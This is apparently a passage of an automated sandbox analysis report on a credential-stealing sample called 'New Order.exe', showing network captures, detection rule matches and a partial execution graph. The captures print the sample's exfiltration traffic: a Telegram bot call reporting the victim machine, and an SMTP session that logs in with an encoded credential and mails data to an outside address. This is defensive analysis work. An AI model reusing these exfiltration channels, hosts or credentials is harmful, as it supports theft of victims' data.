2024-07-25 16:07:48 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:48 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52391 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QY7kT2nNOBR1GGjB7hdcvzDMGmLUKj3w%2B5NEWhtV6%2FP9RRrv%2FLXgVc8zKl8%2B8NVAz6JnIsfcyYuqOrHHWWGib91eLRB7JqjNcQ87kbdHN8RfDU9EN3V2IQJcGZunBnvAexP6A1BL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67b009463308-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:48 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49713	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:49 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 16:07:50 UTC	716	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:49 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52392 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BLGY3O3cfA8m3Y8%2FYfEF%2FAOmX4LG3glBkIKY7xBkbYxFEl1DNqsY85%2BD5JOr8AgnR%2FGGuVVSivMl%2F4%2Bqz6aKy5yvTuayyNMKBW%2ByANKy4kjIrKQ2zkyQEufcoAhoKbCk7ELAi7M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67b93fc34362-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:50 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49715	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:51 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 16:07:51 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:51 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52394 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSEr8xi0YSKkPtX1k%2BmCWncGInsbdLEgWWQLceSbwmRaO%2BUtBowBkj3Rb%2BkzVb28r2YCqllXwPvc8059S4k3DpM8KaFFc%2FOz9Ivkj4mpwebHauschBVUIs2ciIUGXcJYC6Du764Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67c0c8b90c8e-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:51 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49717	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:53 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 16:07:53 UTC	712	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:53 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52396 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oWPbu4qnuRRvg%2FAVURv50Osrd5wG%2F2uOcmboP70mHc5xA6I%2F9OCnnIYDbkGLdY%2FQfqvaLz0lNFaiKiMvclCN9za5g86U%2Bghu9HCjzhp7i2ty57t%2B333IyEYnt8G7JmClWmArvzS7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67cd8b9fc34f-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:53 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49719	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:54 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 16:07:54 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:54 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52397 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkkKkYnuzdPTGDzosF4ObrkpgeS88%2FzgShT4MHgDkRHOSVAeKTK8%2Fl5wPOYhIr6ke%2BhdRjvy34NvZfRhWbHNlqg4AKRzTDOIe2jIpNBjer30IUWwZXO%2BNhmDDbVegI96sCpZT7MX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67d498394388-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:54 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49721	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:55 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 16:07:55 UTC	718	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:55 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52398 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YwXIY6cHK1HhLmS%2FAJ1ZEX5vXUuYb2rZDksNMUIr%2F7Nzqc1SA4A6rRm90H%2Fg9az0%2FrCFGL%2F7w2%2Fkixnl8NatUwMkMAipxGVAySq6rDW%2Btjq%2BkwX%2BXi3WzrUFx3Gr4ocTuCEAfNoV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67dd18cb17c1-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:55 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49723	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:57 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 16:07:57 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:57 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52400 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYLCKQk4y1YZOpyuxDXUGU9IJ40u8WIOfhe7U7huUZLB1pDFMoqIp3smRsbhoMMqBO4Y%2B%2FjbC4yy27UuvkhbGimAzyvcnouQlrwWtMcbTSajUvWhqnQErcf0TewRH4EdPeGboKA2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67e9ce2ec427-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:57 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49724	149.154.167.220	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:58 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2026/07/2024%20/%2001:41:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-07-25 16:07:58 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 16:07:58 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-25 16:07:58 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 25, 2024 18:08:07.248557091 CEST	587	49729	103.163.138.29	192.168.2.10	220-cygnus.jagoanhosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 23:08:07 +0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jul 25, 2024 18:08:07.248877048 CEST	49729	587	192.168.2.10	103.163.138.29	EHLO 405464
Jul 25, 2024 18:08:07.782233953 CEST	587	49729	103.163.138.29	192.168.2.10	250-cygnus.jagoanhosting.com Hello 405464 [8.46.123.33] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jul 25, 2024 18:08:07.784591913 CEST	49729	587	192.168.2.10	103.163.138.29	AUTH login d2lkaUBsZW50ZXJhYW5kYWxhbi5jb20=
Jul 25, 2024 18:08:08.124645948 CEST	587	49729	103.163.138.29	192.168.2.10	334 UGFzc3dvcmQ6
Jul 25, 2024 18:08:08.477339029 CEST	587	49729	103.163.138.29	192.168.2.10	235 Authentication succeeded
Jul 25, 2024 18:08:08.477571011 CEST	49729	587	192.168.2.10	103.163.138.29	MAIL FROM:<widi@lenteraandalan.com>
Jul 25, 2024 18:08:08.826894045 CEST	587	49729	103.163.138.29	192.168.2.10	250 OK
Jul 25, 2024 18:08:08.827217102 CEST	49729	587	192.168.2.10	103.163.138.29	RCPT TO:<armkmc2017@gmail.com>
Jul 25, 2024 18:08:09.171437025 CEST	587	49729	103.163.138.29	192.168.2.10	250 Accepted
Jul 25, 2024 18:08:09.171730042 CEST	49729	587	192.168.2.10	103.163.138.29	DATA
Jul 25, 2024 18:08:09.518290043 CEST	587	49729	103.163.138.29	192.168.2.10	354 Enter message, ending with "." on a line by itself
Jul 25, 2024 18:08:09.518961906 CEST	49729	587	192.168.2.10	103.163.138.29	.
Jul 25, 2024 18:08:16.410465956 CEST	587	49729	103.163.138.29	192.168.2.10	250 OK id=1sX10k-0069TO-0m
Jul 25, 2024 18:09:44.797549009 CEST	49729	587	192.168.2.10	103.163.138.29	QUIT
Jul 25, 2024 18:09:45.353741884 CEST	587	49729	103.163.138.29	192.168.2.10	221 cygnus.jagoanhosting.com closing connection

Target ID:	0
Start time:	12:07:42
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\New Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\New Order.exe"
Imagebase:	0x2c0000
File size:	1'234'944 bytes
MD5 hash:	6610A5896FE0895ED5CA90F938906372
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1263248786.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:07:43
Start date:	25/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\New Order.exe"
Imagebase:	0x990000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.3707765175.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	3.2%
Total number of Nodes:	1904
Total number of Limit Nodes:	55

Executed Functions

Function 002C42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 002C430D

Part of subcall function 002C6B57: _wcslen.LIBCMT ref: 002C6B6A

GetCurrentProcess.KERNEL32(?,0035CB64,00000000,?,?), ref: 002C4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 002C4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 002C4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002C4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 002C4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 002C447B
GetSystemInfo.KERNEL32(?,?,?), ref: 002C44A0

Strings

kernel32.dll, xrefs: 002C444F
GetNativeSystemInfo, xrefs: 002C4460
|O, xrefs: 003036F8

Memory Dump Source

